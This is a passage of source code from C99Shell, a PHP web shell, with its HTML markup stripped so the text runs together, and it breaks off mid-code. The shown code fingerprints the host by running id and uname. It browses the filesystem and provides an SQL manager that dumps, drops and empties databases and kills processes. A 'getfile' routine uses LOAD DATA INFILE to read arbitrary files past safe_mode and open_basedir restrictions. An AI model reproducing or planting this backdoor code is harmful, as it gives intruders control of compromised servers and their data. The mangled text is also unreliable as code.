cellPadding=5 width=100% bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=#C0C0C0trth width=101% height=15 nowrap bordercolor=#C0C0C0 valign=top colspan=2pfont face=Webdings size=6b!bfonta href=php echo $surl; font face=Verdana size=5bC99Shell v. php echo $shver; bfontafont face=Webdings size=6b!bfontpcenterthtrtrtdp align=leftbSoftware php echo $DISP_SERVER_SOFTWARE; b pp align=leftbuname -a php echo wordwrap(php_uname(),90,br,1); b pp align=leftbphp if (!$win) {echo wordwrap(myshellexec(id),90,br,1);} else {echo get_current_user();} b pp align=leftbSafe-mode php echo $hsafemode; bpp align=leftphp $d = str_replace(,DIRECTORY_SEPARATOR,$d); if (empty($d)) {$d = realpath(.);} elseif(realpath($d)) {$d = realpath($d);} $d = str_replace(,DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $d = str_replace(,,$d); $dispd = htmlspecialchars($d); $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); $i = 0; foreach($pd as $b) { $t = ; $j = 0; foreach ($e as $r) { $t.= $r.DIRECTORY_SEPARATOR; if ($j == $i) {break;} $j++; } echo a href=.$surl.act=ls&d=.urlencode($t).&sort=.$sort.b.htmlspecialchars($b).DIRECTORY_SEPARATOR.ba; $i++; } echo    ; if (is_writable($d)) { $wd = true; $wdt = font color=green[ ok ]font; echo bfont color=green.view_perms(fileperms($d)).fontb; } else { $wd = false; $wdt = font color=red[ Read-Only ]font; echo b.view_perms_color($d).b; } if (is_callable(disk_free_space)) { $free = disk_free_space($d); $total = disk_total_space($d); if ($free === false) {$free = 0;} if ($total === false) {$total = 0;} if ($free 0) {$free = 0;} if ($total 0) {$total = 0;} $used = $total-$free; $free_percent = round(100($total$free),2); echo brbFree .view_size($free). of .view_size($total). (.$free_percent.%)b; } echo br; $letters = ; if ($win) { $v = explode(,$d); $v = $v[0]; foreach (range(a,z) as $letter) { $bool = $isdiskette = in_array($letter,$safemode_diskettes); if (!$bool) {$bool = is_dir($letter.);} if ($bool) { $letters .= a href=.$surl.act=ls&d=.urlencode($letter.)..($isdiskette onclick=return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')).[ ; if ($letter. != $v) {$letters .= $letter;} else {$letters .= font color=green.$letter.font;} $letters .= ]a ; } } if (!empty($letters)) {echo bDetected drivesb .$letters.br;} } if (count($quicklaunch) 0) { foreach($quicklaunch as $item) { $item[1] = str_replace(%d,urlencode($d),$item[1]); $item[1] = str_replace(%sort,$sort,$item[1]); $v = realpath($d...); if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} $item[1] = str_replace(%upd,urlencode($v),$item[1]); echo a href=.$item[1]..$item[0].a    ; } } echo ptdtrtablebr; if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo TABLE style=BORDER-COLLAPSE collapse cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=100% bgColor=#333333 borderColorLight=#c0c0c0 border=1trtd width=100% valign=top.$donated_html.tdtrtablebr;} echo TABLE style=BORDER-COLLAPSE collapse cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=100% bgColor=#333333 borderColorLight=#c0c0c0 border=1trtd width=100% valign=top; if ($act == ) {$act = $dspact = ls;} if ($act == sql) { $sql_surl = $surl.act=sql; if ($sql_login) {$sql_surl .= &sql_login=.htmlspecialchars($sql_login);} if ($sql_passwd) {$sql_surl .= &sql_passwd=.htmlspecialchars($sql_passwd);} if ($sql_server) {$sql_surl .= &sql_server=.htmlspecialchars($sql_server);} if ($sql_port) {$sql_surl .= &sql_port=.htmlspecialchars($sql_port);} if ($sql_db) {$sql_surl .= &sql_db=.htmlspecialchars($sql_db);} $sql_surl .= &; h3Attention! SQL-Manager is uNOTu ready module! Don't reports bugs.h3TABLE style=BORDER-COLLAPSE collapse height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=100% bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=#C0C0C0trtd width=100% height=1 colspan=2 valign=topcenterphp if ($sql_server) { $sql_sock = mysql_connect($sql_server..$sql_port, $sql_login, $sql_passwd); $err = mysql_smarterror(); @mysql_select_db($sql_db,$sql_sock); if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} } else {$sql_sock = false;} echo bSQL Managerbbr; if (!$sql_sock) { if (!$sql_server) {echo NO CONNECTION;} else {echo centerbCan't connectbcenter; echo b.$err.b;} } else { $sqlquicklaunch = array(); $sqlquicklaunch[] = array(Index,$surl.act=sql&sql_login=.htmlspecialchars($sql_login).&sql_passwd=.htmlspecialchars($sql_passwd).&sql_server=.htmlspecialchars($sql_server).&sql_port=.htmlspecialchars($sql_port).&); $sqlquicklaunch[] = array(Query,$sql_surl.sql_act=query&sql_tbl=.urlencode($sql_tbl)); $sqlquicklaunch[] = array(Server-status,$surl.act=sql&sql_login=.htmlspecialchars($sql_login).&sql_passwd=.htmlspecialchars($sql_passwd).&sql_server=.htmlspecialchars($sql_server).&sql_port=.htmlspecialchars($sql_port).&sql_act=serverstatus); $sqlquicklaunch[] = array(Server variables,$surl.act=sql&sql_login=.htmlspecialchars($sql_login).&sql_passwd=.htmlspecialchars($sql_passwd).&sql_server=.htmlspecialchars($sql_server).&sql_port=.htmlspecialchars($sql_port).&sql_act=servervars); $sqlquicklaunch[] = array(Processes,$surl.act=sql&sql_login=.htmlspecialchars($sql_login).&sql_passwd=.htmlspecialchars($sql_passwd).&sql_server=.htmlspecialchars($sql_server).&sql_port=.htmlspecialchars($sql_port).&sql_act=processes); $sqlquicklaunch[] = array(Logout,$surl.act=sql); echo centerbMySQL .mysql_get_server_info(). (proto v..mysql_get_proto_info ().) running in .htmlspecialchars($sql_server)..htmlspecialchars($sql_port). as .htmlspecialchars($sql_login).@.htmlspecialchars($sql_server). (password - .htmlspecialchars($sql_passwd).)bbr; if (count($sqlquicklaunch) 0) {foreach($sqlquicklaunch as $item) {echo [ a href=.$item[1].b.$item[0].ba ] ;}} echo center; } echo tdtrtr; if (!$sql_sock) {td width=28% height=100 valign=topcenterfont size=5 i fontcenterliIf login is null, login is owner of process.liIf host is null, host is localhostbliIf port is null, port is 3306 (default)tdtd width=90% height=1 valign=topTABLE height=1 cellSpacing=0 cellPadding=0 width=100% border=0trtd bPlease, fill the formbtabletrtdbUsernamebtdtdbPasswordb tdtdbDatabaseb tdtrform action=php echo $surl; method=POSTinput type=hidden name=act value=sqltrtdinput type=text name=sql_login value=root maxlength=64tdtdinput type=password name=sql_passwd value= maxlength=64tdtdinput type=text name=sql_db value= maxlength=64tdtrtrtdbHostbtdtdbPORTbtdtrtrtd align=rightinput type=text name=sql_server value=localhost maxlength=64tdtdinput type=text name=sql_port value=3306 maxlength=6 size=3tdtdinput type=submit value=Connecttdtrtrtdtdtrformtabletdphp } else { Start left panel if (!empty($sql_db)) { td width=25% height=100% valign=topa href=php echo $surl.act=sql&sql_login=.htmlspecialchars($sql_login).&sql_passwd=.htmlspecialchars($sql_passwd).&sql_server=.htmlspecialchars($sql_server).&sql_port=.htmlspecialchars($sql_port).&; bHomebahr size=1 noshadephp $result = mysql_list_tables($sql_db); if (!$result) {echo mysql_smarterror();} else { echo ---[ a href=.$sql_surl.&b.htmlspecialchars($sql_db).ba ]---br; $c = 0; while ($row = mysql_fetch_array($result)) {$count = mysql_query (SELECT COUNT() FROM .$row[0]); $count_row = mysql_fetch_array($count); echo b» a href=.$sql_surl.sql_db=.htmlspecialchars($sql_db).&sql_tbl=.htmlspecialchars($row[0]).b.htmlspecialchars($row[0]).ba (.$count_row[0].)brb; mysql_free_result($count); $c++;} if (!$c) {echo No tables found in database.;} } } else { td width=1 height=100 valign=topa href=php echo $sql_surl; bHomebahr size=1 noshadephp $result = mysql_list_dbs($sql_sock); if (!$result) {echo mysql_smarterror();} else { form action=php echo $surl; input type=hidden name=act value=sqlinput type=hidden name=sql_login value=php echo htmlspecialchars($sql_login); input type=hidden name=sql_passwd value=php echo htmlspecialchars($sql_passwd); input type=hidden name=sql_server value=php echo htmlspecialchars($sql_server); input type=hidden name=sql_port value=php echo htmlspecialchars($sql_port); select name=sql_dbphp $c = 0; $dbs = ; while ($row = mysql_fetch_row($result)) {$dbs .= option value=.$row[0].; if ($sql_db == $row[0]) {$dbs .= selected;} $dbs .= .$row[0].option; $c++;} echo option value=Databases (.$c.)option; echo $dbs; } selecthr size=1 noshadePlease, select databasehr size=1 noshadeinput type=submit value=Goformphp } End left panel echo tdtd width=100% height=1 valign=top; Start center panel $diplay = true; if ($sql_db) { if (!is_numeric($c)) {$c = 0;} if ($c == 0) {$c = no;} echo hr size=1 noshadecenterbThere are .$c. table(s) in this DB (.htmlspecialchars($sql_db).).br; if (count($dbquicklaunch) 0) {foreach($dbsqlquicklaunch as $item) {echo [ a href=.$item[1]..$item[0].a ] ;}} echo bcenter; $acts = array(,dump); if ($sql_act == tbldrop) {$sql_query = DROP TABLE; foreach($boxtbl as $v) {$sql_query .= n`.$v.` ,;} $sql_query = substr($sql_query,0,-1).;; $sql_act = query;} elseif ($sql_act == tblempty) {$sql_query = ; foreach($boxtbl as $v) {$sql_query .= DELETE FROM `.$v.` n;} $sql_act = query;} elseif ($sql_act == tbldump) {if (count($boxtbl) 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = dump;} elseif ($sql_act == tblcheck) {$sql_query = CHECK TABLE; foreach($boxtbl as $v) {$sql_query .= n`.$v.` ,;} $sql_query = substr($sql_query,0,-1).;; $sql_act = query;} elseif ($sql_act == tbloptimize) {$sql_query = OPTIMIZE TABLE; foreach($boxtbl as $v) {$sql_query .= n`.$v.` ,;} $sql_query = substr($sql_query,0,-1).;; $sql_act = query;} elseif ($sql_act == tblrepair) {$sql_query = REPAIR TABLE; foreach($boxtbl as $v) {$sql_query .= n`.$v.` ,;} $sql_query = substr($sql_query,0,-1).;; $sql_act = query;} elseif ($sql_act == tblanalyze) {$sql_query = ANALYZE TABLE; foreach($boxtbl as $v) {$sql_query .= n`.$v.` ,;} $sql_query = substr($sql_query,0,-1).;; $sql_act = query;} elseif ($sql_act == deleterow) {$sql_query = ; if (!empty($boxrow_all)) {$sql_query = DELETE FROM `.$sql_tbl.`;;} else {foreach($boxrow as $v) {$sql_query .= DELETE FROM `.$sql_tbl.` WHERE.$v. LIMIT 1;n;} $sql_query = substr($sql_query,0,-1);} $sql_act = query;} elseif ($sql_tbl_act == insert) { if ($sql_tbl_insert_radio == 1) { $keys = ; $akeys = array_keys($sql_tbl_insert); foreach ($akeys as $v) {$keys .= `.addslashes($v).`, ;} if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} $values = ; $i = 0; foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct. (;} $values .= '.addslashes($v).'; if ($funct) {$values .= );} $values .= , ; $i++;} if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} $sql_query = INSERT INTO `.$sql_tbl.` ( .$keys. ) VALUES ( .$values. );; $sql_act = query; $sql_tbl_act = browse; } elseif ($sql_tbl_insert_radio == 2) { $set = mysql_buildwhere($sql_tbl_insert,, ,$sql_tbl_insert_functs); $sql_query = UPDATE `.$sql_tbl.` SET .$set. WHERE .$sql_tbl_insert_q. LIMIT 1;; $result = mysql_query($sql_query) or print(mysql_smarterror()); $result = mysql_fetch_array($result, MYSQL_ASSOC); $sql_act = query; $sql_tbl_act = browse; } } if ($sql_act == query) { echo hr size=1 noshade; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = Query was empty;} echo bErrorb br.$sql_query_error.br;} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) {echo table border=0 width=100% height=1trtdform action=.$sql_surl. method=POSTb; if (($sql_query) and (!$submit)) {echo Do you really want to;} else {echo SQL-Query ;} echo bbrbrtextarea name=sql_query cols=100 rows=10.htmlspecialchars($sql_query).textareabrbrinput type=hidden name=sql_act value=queryinput type=hidden name=sql_tbl value=.htmlspecialchars($sql_tbl).input type=hidden name=submit value=1input type=hidden name=sql_goto value=.htmlspecialchars($sql_goto).input type=submit name=sql_confirm value=Yes input type=submit value=Noformtdtrtable;} } if (in_array($sql_act,$acts)) { table border=0 width=100% height=1trtd width=30% height=1bCreate new tablebform action=php echo $surl; input type=hidden name=act value=sqlinput type=hidden name=sql_act value=newtblinput type=hidden name=sql_db value=php echo htmlspecialchars($sql_db); input type=hidden name=sql_login value=php echo htmlspecialchars($sql_login); input type=hidden name=sql_passwd value=php echo htmlspecialchars($sql_passwd); input type=hidden name=sql_server value=php echo htmlspecialchars($sql_server); input type=hidden name=sql_port value=php echo htmlspecialchars($sql_port); input type=text name=sql_newtbl size=20 input type=submit value=Createformtdtd width=30% height=1bDump DBbform action=php echo $surl; input type=hidden name=act value=sqlinput type=hidden name=sql_act value=dumpinput type=hidden name=sql_db value=php echo htmlspecialchars($sql_db); input type=hidden name=sql_login value=php echo htmlspecialchars($sql_login); input type=hidden name=sql_passwd value=php echo htmlspecialchars($sql_passwd); input type=hidden name=sql_server value=php echo htmlspecialchars($sql_server); input type=hidden name=sql_port value=php echo htmlspecialchars($sql_port); input type=text name=dump_file size=30 value=php echo dump_.getenv(SERVER_NAME)._.$sql_db._.date(d-m-Y-H-i-s)..sql;  input type=submit name=submit value=Dumpformtdtd width=30% height=1tdtrtrtd width=30% height=1tdtd width=30% height=1tdtd width=30% height=1tdtrtablephp if (!empty($sql_act)) {echo hr size=1 noshade;} if ($sql_act == newtbl) { echo b; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo DB .htmlspecialchars($sql_newdb). has been created with success!bbr; } else {echo Can't create DB .htmlspecialchars($sql_newdb)..brReasonb .mysql_smarterror();} } elseif ($sql_act == dump) { if (empty($submit)) { $diplay = false; echo form method=GETinput type=hidden name=act value=sqlinput type=hidden name=sql_act value=dumpinput type=hidden name=sql_db value=.htmlspecialchars($sql_db).input type=hidden name=sql_login value=.htmlspecialchars($sql_login).input type=hidden name=sql_passwd value=.htmlspecialchars($sql_passwd).input type=hidden name=sql_server value=.htmlspecialchars($sql_server).input type=hidden name=sql_port value=.htmlspecialchars($sql_port).input type=hidden name=sql_tbl value=.htmlspecialchars($sql_tbl).bSQL-Dumpbbrbr; echo bDBb input type=text name=sql_db value=.urlencode($sql_db).brbr; $v = join (;,$dmptbls); echo bOnly tables (explode ;) bsup1supbb input type=text name=dmptbls value=.htmlspecialchars($v). size=.(strlen($v)+5).brbr; if ($dump_file) {$tmp = $dump_file;} else {$tmp = htmlspecialchars(.dump_.getenv(SERVER_NAME)._.$sql_db._.date(d-m-Y-H-i-s)..sql);} echo bFileb input type=text name=sql_dump_file value=.$tmp. size=.(strlen($tmp)+strlen($tmp) % 30).brbr; echo bDownload b input type=checkbox name=sql_dump_download value=1 checkedbrbr; echo bSave to file b input type=checkbox name=sql_dump_savetofile value=1 checked; echo brbrinput type=submit name=submit value=Dumpbrbrbsup1supb - all, if empty; echo form; } else { $diplay = true; $set = array(); $set[sock] = $sql_sock; $set[db] = $sql_db; $dump_out = download; $set[print] = 0; $set[nl2br] = 0; $set[] = 0; $set[file] = $dump_file; $set[add_drop] = true; $set[onlytabs] = array(); if (!empty($dmptbls)) {$set[onlytabs] = explode(;,$dmptbls);} $ret = mysql_dump($set); if ($sql_dump_download) { @ob_clean(); header(Content-type applicationoctet-stream); header(Content-length .strlen($ret)); header(Content-disposition attachment; filename=.basename($sql_dump_file).;); echo $ret; exit; } elseif ($sql_dump_savetofile) { $fp = fopen($sql_dump_file,w); if (!$fp) {echo bDump error! Can't write to .htmlspecialchars($sql_dump_file).!;} else { fwrite($fp,$ret); fclose($fp); echo bDumped! Dump has been writed to .htmlspecialchars(realpath($sql_dump_file)). (.view_size(filesize($sql_dump_file)).)b.; } } else {echo bDump nothing to do!b;} } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_act)) {$sql_tbl_act = browse;} $count = mysql_query(SELECT COUNT() FROM `.$sql_tbl.`;); $count_row = mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result = mysql_query(SHOW FIELDS FROM `.$sql_tbl.`;); $tbl_struct_fields = array(); while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} if ($sql_ls $sql_le) {$sql_le = $sql_ls + $perpage;} if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} $perpage = $sql_tbl_le - $sql_tbl_ls; if (!is_numeric($perpage)) {$perpage = 10;} $numpages = $count_row[0]$perpage; $e = explode( ,$sql_order); if (count($e) == 2) { if ($e[0] == d) {$asc_desc = DESC;} else {$asc_desc = ASC;} $v = ORDER BY `.$e[1].` .$asc_desc. ; } else {$v = ;} $query = SELECT FROM `.$sql_tbl.` .$v.LIMIT .$sql_tbl_ls. , .$perpage.; $result = mysql_query($query) or print(mysql_smarterror()); echo hr size=1 noshadecenterbTable .htmlspecialchars($sql_tbl). (.mysql_num_fields($result). cols and .$count_row[0]. rows)bcenter; echo a href=.$sql_surl.sql_tbl=.urlencode($sql_tbl).&sql_tbl_act=structure[ bStructureb ]a   ; echo a href=.$sql_surl.sql_tbl=.urlencode($sql_tbl).&sql_tbl_act=browse[ bBrowseb ]a   ; echo a href=.$sql_surl.sql_tbl=.urlencode($sql_tbl).&sql_act=tbldump&thistbl=1[ bDumpb ]a   ; echo a href=.$sql_surl.sql_tbl=.urlencode($sql_tbl).&sql_tbl_act=insert[ bInsertb ]a   ; if ($sql_tbl_act == structure) {echo brbrbComing sooon!b;} if ($sql_tbl_act == insert) { if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} if (!empty($sql_tbl_insert_radio)) { } else { echo brbrbInserting row into tablebbr; if (!empty($sql_tbl_insert_q)) { $sql_query = SELECT FROM `.$sql_tbl.`; $sql_query .= WHERE.$sql_tbl_insert_q; $sql_query .= LIMIT 1;; $result = mysql_query($sql_query,$sql_sock) or print(brbr.mysql_smarterror()); $values = mysql_fetch_assoc($result); mysql_free_result($result); } else {$values = array();} echo form method=POSTTABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=1% bgColor=#333333 borderColorLight=#c0c0c0 border=1trtdbFieldbtdtdbTypebtdtdbFunctionbtdtdbValuebtdtr; foreach ($tbl_struct_fields as $field) { $name = $field[Field]; if (empty($sql_tbl_insert_q)) {$v = ;} echo trtdb.htmlspecialchars($name).btdtd.$field[Type].tdtdselect name=sql_tbl_insert_functs[.htmlspecialchars($name).]option value=optionoptionPASSWORDoptionoptionMD5optionoptionENCRYPToptionoptionASCIIoptionoptionCHARoptionoptionRANDoptionoptionLAST_INSERT_IDoptionoptionCOUNToptionoptionAVGoptionoptionSUMoptionoption value=--------optionoptionSOUNDEXoptionoptionLCASEoptionoptionUCASEoptionoptionNOWoptionoptionCURDATEoptionoptionCURTIMEoptionoptionFROM_DAYSoptionoptionFROM_UNIXTIMEoptionoptionPERIOD_ADDoptionoptionPERIOD_DIFFoptionoptionTO_DAYSoptionoptionUNIX_TIMESTAMPoptionoptionUSERoptionoptionWEEKDAYoptionoptionCONCAToptionselecttdtdinput type=text name=sql_tbl_insert[.htmlspecialchars($name).] value=.htmlspecialchars($values[$name]). size=50tdtr; $i++; } echo tablebr; echo input type=radio name=sql_tbl_insert_radio value=1; if (empty($sql_tbl_insert_q)) {echo checked;} echo bInsert as new rowb; if (!empty($sql_tbl_insert_q)) {echo or input type=radio name=sql_tbl_insert_radio value=2 checkedbSaveb; echo input type=hidden name=sql_tbl_insert_q value=.htmlspecialchars($sql_tbl_insert_q).;} echo brbrinput type=submit value=Confirmform; } } if ($sql_tbl_act == browse) { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo hr size=1 noshade; echo img src=.$surl.act=img&img=multipage height=12 width=10 alt=Pages ; $b = 0; for($i=0;$i$numpages;$i++) { if (($i$perpage != $sql_tbl_ls) or ($i$perpage+$perpage != $sql_tbl_le)) {echo a href=.$sql_surl.sql_tbl=.urlencode($sql_tbl).&sql_order=.htmlspecialchars($sql_order).&sql_tbl_ls=.($i$perpage).&sql_tbl_le=.($i$perpage+$perpage).u;} echo $i; if (($i$perpage != $sql_tbl_ls) or ($i$perpage+$perpage != $sql_tbl_le)) {echo ua;} if (($i30 == round($i30)) and ($i 0)) {echo br;} else {echo  ;} } if ($i == 0) {echo empty;} echo form method=GETinput type=hidden name=act value=sqlinput type=hidden name=sql_db value=.htmlspecialchars($sql_db).input type=hidden name=sql_login value=.htmlspecialchars($sql_login).input type=hidden name=sql_passwd value=.htmlspecialchars($sql_passwd).input type=hidden name=sql_server value=.htmlspecialchars($sql_server).input type=hidden name=sql_port value=.htmlspecialchars($sql_port).input type=hidden name=sql_tbl value=.htmlspecialchars($sql_tbl).input type=hidden name=sql_order value=.htmlspecialchars($sql_order).bFromb input type=text name=sql_tbl_ls value=.$sql_tbl_ls. bTob input type=text name=sql_tbl_le value=.$sql_tbl_le. input type=submit value=Viewform; echo brform method=POSTTABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=1% bgColor=#333333 borderColorLight=#c0c0c0 border=1; echo tr; echo tdinput type=checkbox name=boxrow_all value=1td; for ($i=0;$imysql_num_fields($result);$i++) { $v = mysql_field_name($result,$i); if ($e[0] == a) {$s = d; $m = asc;} else {$s = a; $m = desc;} echo td; if (empty($e[0])) {$e[0] = a;} if ($e[1] != $v) {echo a href=.$sql_surl.sql_tbl=.$sql_tbl.&sql_tbl_le=.$sql_tbl_le.&sql_tbl_ls=.$sql_tbl_ls.&sql_order=.$e[0].%20.$v.b.$v.ba;} else {echo b.$v.ba href=.$sql_surl.sql_tbl=.$sql_tbl.&sql_tbl_le=.$sql_tbl_le.&sql_tbl_ls=.$sql_tbl_ls.&sql_order=.$s.%20.$v.img src=.$surl.act=img&img=sort_.$m. height=9 width=14 alt=.$m.a;} echo td; } echo tdfont color=greenbActionbfonttd; echo tr; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo tr; $w = ; $i = 0; foreach ($row as $k=$v) {$name = mysql_field_name($result,$i); $w .= `.$name.` = '.addslashes($v).' AND; $i++;} if (count($row) 0) {$w = substr($w,0,strlen($w)-3);} echo tdinput type=checkbox name=boxrow[] value=.$w.td; $i = 0; foreach ($row as $k=$v) { $v = htmlspecialchars($v); if ($v == ) {$v = font color=greenNULLfont;} echo td.$v.td; $i++; } echo td; echo a href=.$sql_surl.sql_act=query&sql_tbl=.urlencode($sql_tbl).&sql_tbl_ls=.$sql_tbl_ls.&sql_tbl_le=.$sql_tbl_le.&sql_query=.urlencode(DELETE FROM `.$sql_tbl.` WHERE.$w. LIMIT 1;).img src=.$surl.act=img&img=sql_button_drop alt=Delete height=13 width=11 border=0a ; echo a href=.$sql_surl.sql_tbl_act=insert&sql_tbl=.urlencode($sql_tbl).&sql_tbl_ls=.$sql_tbl_ls.&sql_tbl_le=.$sql_tbl_le.&sql_tbl_insert_q=.urlencode($w).img src=.$surl.act=img&img=change alt=Edit height=14 width=14 border=0a ; echo td; echo tr; } mysql_free_result($result); echo tablehr size=1 noshadep align=leftimg src=.$surl.act=img&img=arrow_ltr border=0select name=sql_act; echo option value=With selectedoption; echo option value=deleterowDeleteoption; echo select input type=submit value=Confirmformp; } } else { $result = mysql_query(SHOW TABLE STATUS, $sql_sock); if (!$result) {echo mysql_smarterror();} else { echo brform method=POSTTABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=100% bgColor=#333333 borderColorLight=#c0c0c0 border=1trtdinput type=checkbox name=boxtbl_all value=1tdtdcenterbTablebcentertdtdbRowsbtdtdbTypebtdtdbCreatedbtdtdbModifiedbtdtdbSizebtdtdbActionbtdtr; $i = 0; $tsize = $trows = 0; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $tsize += $row[Data_length]; $trows += $row[Rows]; $size = view_size($row[Data_length]); echo tr; echo tdinput type=checkbox name=boxtbl[] value=.$row[Name].td; echo td a href=.$sql_surl.sql_tbl=.urlencode($row[Name]).b.$row[Name].ba td; echo td.$row[Rows].td; echo td.$row[Type].td; echo td.$row[Create_time].td; echo td.$row[Update_time].td; echo td.$size.td; echo td a href=.$sql_surl.sql_act=query&sql_query=.urlencode(DELETE FROM `.$row[Name].`).img src=.$surl.act=img&img=sql_button_empty alt=Empty height=13 width=11 border=0a  a href=.$sql_surl.sql_act=query&sql_query=.urlencode(DROP TABLE `.$row[Name].`).img src=.$surl.act=img&img=sql_button_drop alt=Drop height=13 width=11 border=0a a href=.$sql_surl.sql_tbl_act=insert&sql_tbl=.$row[Name].img src=.$surl.act=img&img=sql_button_insert alt=Insert height=13 width=11 border=0a td; echo tr; $i++; } echo tr bgcolor=000000; echo tdcenterb»bcentertd; echo tdcenterb.$i. table(s)bcentertd; echo tdb.$trows.btd; echo td.$row[1].td; echo td.$row[10].td; echo td.$row[11].td; echo tdb.view_size($tsize).btd; echo tdtd; echo tr; echo tablehr size=1 noshadep align=rightimg src=.$surl.act=img&img=arrow_ltr border=0select name=sql_act; echo option value=With selectedoption; echo option value=tbldropDropoption; echo option value=tblemptyEmptyoption; echo option value=tbldumpDumpoption; echo option value=tblcheckCheck tableoption; echo option value=tbloptimizeOptimize tableoption; echo option value=tblrepairRepair tableoption; echo option value=tblanalyzeAnalyze tableoption; echo select input type=submit value=Confirmformp; mysql_free_result($result); } } } } } else { $acts = array(,newdb,serverstatus,servervars,processes,getfile); if (in_array($sql_act,$acts)) {table border=0 width=100% height=1trtd width=30% height=1bCreate new DBbform action=php echo $surl; input type=hidden name=act value=sqlinput type=hidden name=sql_act value=newdbinput type=hidden name=sql_login value=php echo htmlspecialchars($sql_login); input type=hidden name=sql_passwd value=php echo htmlspecialchars($sql_passwd); input type=hidden name=sql_server value=php echo htmlspecialchars($sql_server); input type=hidden name=sql_port value=php echo htmlspecialchars($sql_port); input type=text name=sql_newdb size=20 input type=submit value=Createformtdtd width=30% height=1bView Filebform action=php echo $surl; input type=hidden name=act value=sqlinput type=hidden name=sql_act value=getfileinput type=hidden name=sql_login value=php echo htmlspecialchars($sql_login); input type=hidden name=sql_passwd value=php echo htmlspecialchars($sql_passwd); input type=hidden name=sql_server value=php echo htmlspecialchars($sql_server); input type=hidden name=sql_port value=php echo htmlspecialchars($sql_port); input type=text name=sql_getfile size=30 value=php echo htmlspecialchars($sql_getfile);  input type=submit value=Getformtdtd width=30% height=1tdtrtrtd width=30% height=1tdtd width=30% height=1tdtd width=30% height=1tdtrtablephp } if (!empty($sql_act)) { echo hr size=1 noshade; if ($sql_act == newdb) { echo b; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo DB .htmlspecialchars($sql_newdb). has been created with success!bbr;} else {echo Can't create DB .htmlspecialchars($sql_newdb)..brReasonb .mysql_smarterror();} } if ($sql_act == serverstatus) { $result = mysql_query(SHOW STATUS, $sql_sock); echo centerbServer-status variablesbbrbr; echo TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1tdbNamebtdtdbValuebtdtr; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo trtd.$row[0].tdtd.$row[1].tdtr;} echo tablecenter; mysql_free_result($result); } if ($sql_act == servervars) { $result = mysql_query(SHOW VARIABLES, $sql_sock); echo centerbServer variablesbbrbr; echo TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1tdbNamebtdtdbValuebtdtr; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo trtd.$row[0].tdtd.$row[1].tdtr;} echo table; mysql_free_result($result); } if ($sql_act == processes) { if (!empty($kill)) {$query = KILL .$kill.;; $result = mysql_query($query, $sql_sock); echo bKilling process #.$kill.... ok. he is dead, amen.b;} $result = mysql_query(SHOW PROCESSLIST, $sql_sock); echo centerbProcessesbbrbr; echo TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1tdbIDbtdtdbUSERbtdtdbHOSTbtdtdbDBbtdtdbCOMMANDbtdtdbTIMEbtdtdbSTATEbtdtdbINFObtdtdbActionbtdtr; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo trtd.$row[0].tdtd.$row[1].tdtd.$row[2].tdtd.$row[3].tdtd.$row[4].tdtd.$row[5].tdtd.$row[6].tdtd.$row[7].tdtda href=.$sql_surl.sql_act=processes&kill=.$row[0].uKilluatdtr;} echo table; mysql_free_result($result); } if ($sql_act == getfile) { $tmpdb = $sql_login._tmpdb; $select = mysql_select_db($tmpdb); if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} if ($select) { $created = false; mysql_query(CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );); mysql_query(LOAD DATA INFILE .addslashes($sql_getfile). INTO TABLE tmp_file); $result = mysql_query(SELECT FROM tmp_file;); if (!$result) {echo bError in reading file (permision denied)!b;} else { for ($i=0;$imysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} $f = ; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join (rn,$row);} if (empty($f)) {echo bFile .$sql_getfile. does not exists or empty!bbr;} else {echo bFile .$sql_getfile.bbr.nl2br(htmlspecialchars($f)).br;} mysql_free_result($result); mysql_query(DROP TABLE tmp_file;); } } 